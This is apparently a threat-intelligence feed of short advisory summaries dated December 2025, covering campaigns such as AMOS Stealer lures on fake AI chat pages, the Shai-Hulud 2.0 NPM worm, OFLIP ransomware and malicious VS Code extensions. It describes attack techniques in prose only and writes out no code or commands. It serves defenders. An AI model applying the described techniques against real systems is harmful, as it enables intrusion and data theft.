Researchers from Huntress have uncovered an AMOS Stealer campaign that uses AI-themed troubleshooting pages and search-engine manipulation to lure macOS users. The attack begins when users search for routine Mac maintenance help and are directed to attacker-controlled pages mimicking AI assistants like ChatGPT or Grok. Within these fake chat interfaces, victims are instructed to run benign Terminal commands that actually download and execute a hidden stealer loader. Once active, the malware silently collects system credentials, browser data, and cryptocurrency wallet information while avoiding any visible signs of installation. It persists using standard macOS mechanisms—including LaunchDaemons and user-level watchdog scripts—ensuring it re-launches after reboots or termination attempts. The stealer also checks for virtual machine environments before fully deploying and exfiltrates stolen data to attacker-controlled servers. This campaign exploits user trust in search results, AI chat interfaces, and copy-paste workflows, targeting everyday macOS users, particularly those handling cryptocurrency or sensitive browser-based accounts.
Source: https://www.huntress.com/blog/amos-stealer-chatgpt-grok-ai-trust
2025-12-11
PA_Email_Compromise_via_Malicious_PDFs
MEDIUM
Intel Source:
CERT AGID
Intel Name:
PA_Email_Compromise_via_Malicious_PDFs
Date of Scan:
2025-12-11
Impact:
MEDIUM
Summary:
Researchers at CERT-AGID have identified an ongoing phishing campaign targeting Italian Public Administration (PA) entities through the use of compromised institutional email accounts. The attackers leverage these accounts to distribute convincing emails containing malicious PDF attachments that appear to be legitimate document notifications. When recipients open the attached PDF, they are prompted to click a “Review Documents” button, which redirects them to a genuine Figma login page, exploiting the platform’s legitimacy to collect user credentials. Once the victim attempts to authenticate using an email or Google account, the attackers gain access to real user identifiers and potentially sensitive login information. CERT-AGID confirmed that two PA administrations have been compromised so far, with further spread not ruled out.
Source: https://cert-agid.gov.it/news/campagna-malevola-in-atto-abusa-di-utenze-pa-tramite-allegati-pdf-e-accesso-a-figma/
2025-12-11
EtherRAT_DPRK_Ethereum_implant_via_React2Shell
LOW
Intel Source:
Sysdig Threat Research Team
Intel Name:
EtherRAT_DPRK_Ethereum_implant_via_React2Shell
Date of Scan:
2025-12-11
Impact:
LOW
Summary:
The Sysdig Threat Research Team reports EtherRAT, a Node.js-based persistent implant deployed via React2Shell (CVE-2025-55182). The malware uses blockchain-based C2 resolution through Ethereum smart contracts, a four-stage delivery chain, and AES-encrypted payloads. It downloads a legitimate Node.js runtime to reduce detection and installs five Linux persistence mechanisms for durable access. EtherRAT polls nine RPC endpoints for resilient C2 and supports self-updating to evade signatures. While attribution is not confirmed, several techniques overlap with DPRK “Contagious Interview” tooling. The implant provides operators full asynchronous JavaScript execution for continued reconnaissance and tasking.
Source: https://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks
2025-12-10
Storm_0249_Shifts_to_Precision_Post_Exploitation
HIGH
Intel Source:
Reliaquest
Intel Name:
Storm_0249_Shifts_to_Precision_Post_Exploitation
Date of Scan:
2025-12-10
Impact:
HIGH
Summary:
ReliaQuest researchers have identified Storm-0249 as a financially motivated initial access broker that has shifted from broad phishing campaigns to more targeted post-exploitation operations aimed at hijacking trusted endpoint security processes. The group leverages a legitimate SentinelOne helper process to sideload a malicious DLL, enabling SYSTEM-level execution and long-term persistence through MSI installers. After delivering these deceptive installers via Microsoft-themed infrastructure, the attackers use curl and PowerShell commands to deploy fileless payloads that execute directly in memory. Once inside a network, Storm-0249 performs extensive host reconnaissance using built-in Windows utilities and registry queries, collecting identifiers such as MachineGuid, which ransomware affiliates can later use to bind encryption keys to specific victims. The group also routes its command-and-control traffic through the same SentinelOne process, causing malicious TLS communications to blend in with legitimate EDR telemetry.
Source: https://reliaquest.com/blog/threat-spotlight-storm-0249-precision-endpoint-exploitation
2025-12-10
OFLIP_Ransomware
HIGH
Intel Source:
Palo Alto
Intel Name:
OFLIP_Ransomware
Date of Scan:
2025-12-10
Impact:
HIGH
Summary:
Researchers at Palo Alto Networks have uncovered a financially motivated threat group, known as CL-CRI-1036, using a new Rust-based ransomware called OFLIP to target organizations in the Asia-Pacific region. The attackers gain access through manual intrusions and use the Sliver framework for command-and-control and lateral movement across both Windows and Linux environments. The ransomware is designed to work quickly rather than stealthily. It scans available drives, encrypts user files, and drops ransom notes in writable directories while excluding specific file types to keep systems functional. After encrypting data, it tries to delete and overwrite its own files to make detection harder. The operators demand payment in cryptocurrency and threaten to leak stolen data on underground forums, although the malware itself has no built-in exfiltration capability, suggesting the use of separate tools or potential bluffing.
Source: https://unit42.paloaltonetworks.com/new-ransomware-01flip-written-in-rust/
2025-12-10
BigBlack_Malicious_VS_Code_Extensions
HIGH
Intel Source:
KOI Security
Intel Name:
BigBlack_Malicious_VS_Code_Extensions
Date of Scan:
2025-12-10
Impact:
HIGH
Summary:
Researchers at Koi Security have identified a campaign distributing malicious Visual Studio Code extensions that exfiltrate sensitive developer data through stealthy infostealer payloads. The operation leverages two extensions—one disguised as a cryptocurrency-themed color scheme and another posing as an AI coding assistant—to target developers with varying social engineering lures. Once installed, these extensions execute hidden scripts that download additional payloads capable of capturing screenshots, harvesting WiFi credentials, and stealing browser session tokens. The malware employs DLL hijacking to conceal its activity under legitimate processes, ensuring persistence and evasion of security controls. Analysis of multiple versions revealed iterative refinement by the threat actor, who improved reliability and stealth across updates while maintaining the same command infrastructure and payload delivery chain. Victimology points to software developers and technical professionals, particularly those interested in cryptocurrency or AI-enhanced development tools.
Source: https://www.koi.ai/blog/the-vs-code-malware-that-captures-your-screen
2025-12-09
VSCode_Extension_Drops_Anivia_Loader_and_OctoRAT
HIGH
Intel Source:
Hunt.IO
Intel Name:
VSCode_Extension_Drops_Anivia_Loader_and_OctoRAT
Date of Scan:
2025-12-09
Impact:
HIGH
Summary:
Researchers at Hunt.io have uncovered a supply-chain compromise targeting developers through the Visual Studio Code extension ecosystem, where attackers published a fake Prettier extension under a deceptive publisher profile and delivered a staged attack chain involving a VBScript dropper, an Anivia loader and finally the OctoRAT remote access toolkit. The initial payloads were fetched from a public code repository and relied on AES encryption and process hollowing to stay in memory, while Anivia decrypted and executed OctoRAT inside a legitimate .NET system binary to avoid reputation-based defenses. The scans also found multiple active control panels tied together by shared TLS certificate infrastructure and hosted across European providers.
Source: https://hunt.io/blog/malicious-vscode-extension-anivia-octorat-attack-chain
2025-12-09
Intellexa_Ongoing_Zero_Day_Exploits_Persist
HIGH
Intel Source:
Google Threat Intelligence
Intel Name:
Intellexa_Ongoing_Zero_Day_Exploits_Persist
Date of Scan:
2025-12-09
Impact:
HIGH
Summary:
Researchers at Google’s Threat Intelligence Group (GTIG) have identified continued offensive cyber operations conducted by the commercial spyware vendor Intellexa, which remains active despite international sanctions and prior exposure. The group has repeatedly developed and deployed zero-day exploit chains targeting major mobile platforms including iOS and Android, often chaining vulnerabilities in Chrome and Safari to achieve remote code execution and privilege escalation. GTIG’s analysis highlights Intellexa’s sustained ability to procure or develop new zero-days rapidly, indicating a robust exploit acquisition network and a high level of technical sophistication. The exploits have been leveraged to deliver Predator spyware, a tool capable of extensive surveillance, including microphone and camera capture, keylogging, and VOIP recording. Recent campaigns have been observed in regions such as Egypt and Saudi Arabia, with delivery mechanisms relying on one-time links and messaging app redirections.
Source: https://cloud.google.com/blog/topics/threat-intelligence/intellexa-zero-day-exploits-continue/
2025-12-09
AutoIT3_Loader_Shellcode_via_FileInstall_Abuse
HIGH
Intel Source:
ISC.SANS
Intel Name:
AutoIT3_Loader_Shellcode_via_FileInstall_Abuse
Date of Scan:
2025-12-09
Impact:
HIGH
Summary:
Researchers at the SANS Internet Storm Center have identified a renewed wave of malicious activity leveraging AutoIT3-compiled scripts as loaders for shellcode execution. AutoIT3, a Windows automation language, is being abused by threat actors to embed and execute payloads through its FileInstall() function, allowing malicious files to be packed directly into compiled executables. The observed campaigns demonstrate how attackers use this feature to unpack obfuscated payloads into temporary directories and execute them in memory, effectively bypassing traditional endpoint defenses. The scripts employ lightweight obfuscation routines to conceal shellcode loading logic, ultimately invoking Windows API calls such as CallWindowProc() to execute malicious code. This technique has been linked to the distribution of remote access and data theft tools, indicating an adaptable and ongoing use of AutoIT3 as a loader platform.
Source: https://isc.sans.edu/index_cached.html
2025-12-09
Shai_Hulud_2_GitHub_NPM_Worm
HIGH
Intel Source:
Trustwave and Iru
Intel Name:
Shai_Hulud_2_GitHub_NPM_Worm
Date of Scan:
2025-12-09
Impact:
HIGH
Summary:
Researchers at Trustwave SpiderLabs and Iru have identified Shai-Hulud 2.0, a sophisticated self-replicating malware targeting the Node Package Manager (NPM) ecosystem and GitHub-based CI/CD pipelines. The threat actors behind this campaign exploited a GitHub Actions injection vulnerability to steal NPM publishing tokens, allowing them to distribute maliciously modified NPM packages. Once installed, the malware executes JavaScript-based payloads that harvest authentication credentials and API tokens from cloud platforms including GitHub, AWS, GCP, and Azure. It also propagates automatically by republishing infected packages under compromised developer accounts. The malware establishes persistence by registering the infected host as a GitHub self-hosted runner and abuses GitHub Discussions as a covert command and control mechanism.
Source: https://the-sequence.com/investigating-shai-hulud https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/sha1-hulud-the-second-coming-of-the-new-npm-github-worm/
2025-12-08
Russian_Actor_Spoofs_European_Security_Events
MEDIUM
Intel Source:
Volexity
Intel Name:
Russian_Actor_Spoofs_European_Security_Events
Date of Scan:
2025-12-08
Impact:
MEDIUM
Summary:
Researchers have identified that the Russian state-linked group UTA0355 is conducting highly targeted phishing campaigns by impersonating legitimate European security and policy conferences. The actors create polished registration websites for events such as the Belgrade Security Conference and use tailored phishing emails along with follow-up conversations over WhatsApp or Signal to draw in selected Microsoft 365 users. Once credentials are obtained, the attackers access mailboxes and files, register new devices in Entra ID to maintain long-term persistence, and route follow-on activity through proxy infrastructure to obscure their location and blend in with normal user behavior. The group also acquires lookalike domains and leverages obscure email services to build additional conference-themed infrastructure, demonstrating strong social-engineering capabilities and an increasingly mature approach to cloud identity abuse.
Source: https://www.volexity.com/blog/2025/12/04/dangerous-invitations-russian-threat-actor-spoofs-european-security-events-in-targeted-phishing-attacks/
2025-12-08
Gamaredon_Exploits_CVE_2025_8088_in_Phishing
MEDIUM
Intel Source:
360 Threat Intelligence Center
Intel Name:
Gamaredon_Exploits_CVE_2025_8088_in_Phishing
Date of Scan:
2025-12-08
Impact:
MEDIUM
Summary:
Researchers at the 360 Threat Intelligence Center have observed that APT-C-53 (Gamaredon), a Russia-aligned espionage group active since at least 2013, is escalating its operations against Ukrainian government and military targets in 2025. The campaign abuses a newly disclosed WinRAR directory-traversal flaw, CVE-2025-8088, to deliver spear-phishing archives that quietly drop HTA malware into the Windows startup folder. When opened, the crafted archive writes a hidden payload to a persistence path that executes at the next login, launching a VBScript downloader that fetches a second-stage script from a remote command server. The second stage uses Gamaredon’s typical multi-layer obfuscation, including string replacement and Base64 decoding, to rebuild modules that collect system information, establish C2 communication, deploy extra persistence techniques, and create disguised scheduled tasks for long-term access.
Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507617&idx=1&sn=9a64ed18ff9ef62dc3e66b76b1ac6a8b&poc_token=HKWjNmmjSO_ORPHgzOWBy8PUxksBUYloflvqDQ20
2025-12-08
ShadyPanda_Sleeper_Spyware_Extensions
HIGH
Intel Source:
Malwarebytes
Intel Name:
ShadyPanda_Sleeper_Spyware_Extensions
Date of Scan:
2025-12-08
Impact:
HIGH
Summary:
Researchers at Malwarebytes have identified a large-scale spyware campaign leveraging long-dormant Chrome and Edge browser extensions that turned malicious after years of normal behavior. The campaign, linked to the threat group ShadyPanda, affected approximately 4.3 million devices worldwide. Initially published as legitimate tools, the extensions later transformed into a remote code execution platform capable of downloading and executing malicious JavaScript within the browser environment. This allowed attackers to monitor user activity, including visited websites and search queries, and to transmit collected data to infrastructure controlled by actors believed to be operating from China. One of the most widespread extensions, WeTab, accumulated millions of installations before exhibiting malicious behavior.
Source: https://www.malwarebytes.com/blog/news/2025/12/sleeper-browser-extensions-woke-up-as-spyware-on-4-million-devices
2025-12-07
WARP_PANDA_China_Nexus_vCenter_Intrusions
HIGH
Intel Source:
Crowdstrike
Intel Name:
WARP_PANDA_China_Nexus_vCenter_Intrusions
Date of Scan:
2025-12-07
Impact:
HIGH
Summary:
Researchers at CrowdStrike have identified a newly designated China-nexus threat actor known as WARP PANDA, responsible for multiple intrusions throughout 2025 targeting VMware vCenter and ESXi environments across U.S.-based legal, technology, and manufacturing sectors. The group demonstrates a high degree of technical sophistication and operational security, emphasizing persistence and covert access to compromised cloud and virtualization infrastructure. WARP PANDA employs a custom malware toolkit including BRICKSTORM, Junction, and GuestConduit, all written in Golang and designed for tunneling, persistence, and stealth within virtualized networks. The adversary leverages unregistered virtual machines, file timestamp manipulation, and masquerading as legitimate vCenter processes to evade detection.
Source: https://www.crowdstrike.com/en-us/blog/warp-panda-cloud-threats/
2025-12-07
JSSMUGGLER_Multi_Stage_JavaScript_RAT_Loader
HIGH
Intel Source:
Securonix Threat Research
Intel Name:
JSSMUGGLER_Multi_Stage_JavaScript_RAT_Loader
Date of Scan:
2025-12-07
Impact:
HIGH
Summary:
Researchers at Securonix Threat Research have identified a sophisticated multi-stage web-based intrusion campaign known as JSSMUGGLER, which employs advanced obfuscation and stealth techniques to deliver the NetSupport Remote Access Trojan (RAT). The campaign begins with the injection of an obfuscated JavaScript loader into compromised websites, designed to evade detection through junk text, encoded strings, and dynamic runtime execution. Once executed, the loader determines the victim’s environment, using device-aware logic to deliver a secondary HTML Application (HTA) payload executed through mshta.exe. This HTA stage decrypts and executes a PowerShell stager entirely in memory, bypassing standard execution policies and security controls. The final stage deploys the NetSupport RAT, providing the attacker with persistent remote access, file manipulation, keylogging, and surveillance capabilities.
Source: https://www.securonix.com/blog/jssmuggler-multi-stage-hidden-iframes-obfuscated-javascript-silent-redirectors-netsupport-rat-delivery/
2025-12-07
UDPGangster_MuddyWater_Espionage_Campaigns
HIGH
Intel Source:
Fortinet
Intel Name:
UDPGangster_MuddyWater_Espionage_Campaigns
Date of Scan:
2025-12-07
Impact:
HIGH
Summary:
Researchers at FortiGuard Labs have identified a new wave of espionage-focused campaigns conducted by the MuddyWater threat group deploying a UDP-based backdoor known as UDPGangster. The operation employs malicious Microsoft Word documents containing VBA macros to deliver the malware, which executes once victims enable embedded content. The payload uses the Windows API to decode and run concealed data, establishing command and control over UDP to avoid traditional network detection. Once installed, UDPGangster achieves persistence via registry keys and mutex creation while enabling remote code execution, file exfiltration, and payload updates. The malware incorporates extensive anti-analysis measures, including debugger, hardware, and sandbox detection, ensuring it operates only on genuine systems. FortiGuard analysts observed active campaigns targeting government and educational sectors in Turkey, Israel, and Azerbaijan, using localized phishing lures to improve delivery success. The consistency in TTPs, infrastructure, and document macros links the campaigns to MuddyWater’s ongoing regional espionage activity, highlighting a sustained and technically capable threat actor with strong operational security.
Source: https://www.fortinet.com/blog/threat-research/udpgangster-campaigns-target-multiple-countries
2025-12-07
SSH_Trojan_via_Government_IP_Compromise
HIGH
Intel Source:
ISC.SANS
Intel Name:
SSH_Trojan_via_Government_IP_Compromise
Date of Scan:
2025-12-07
Impact:
HIGH
Summary:
Researchers at the SANS Internet Storm Center (ISC) identified an intrusion involving a sophisticated SSH-based trojan deployment following a brute-force compromise of a honeypot system. The attack began with an automated login attempt using default credentials, after which the threat actor established a brief connection and uploaded a trojan masquerading as a legitimate SSH daemon. Analysis revealed the malware was engineered for persistence, credential harvesting, privilege escalation, and defense evasion, demonstrating a high degree of operational discipline. The malicious activity mapped to multiple MITRE ATT&CK techniques, including valid account abuse, brute-force authentication, and client software compromise. Investigators noted the source IP address originated from a government network, but emphasized this likely reflected a compromised asset rather than direct state involvement.
Source: https://isc.sans.edu/diary/rss/32536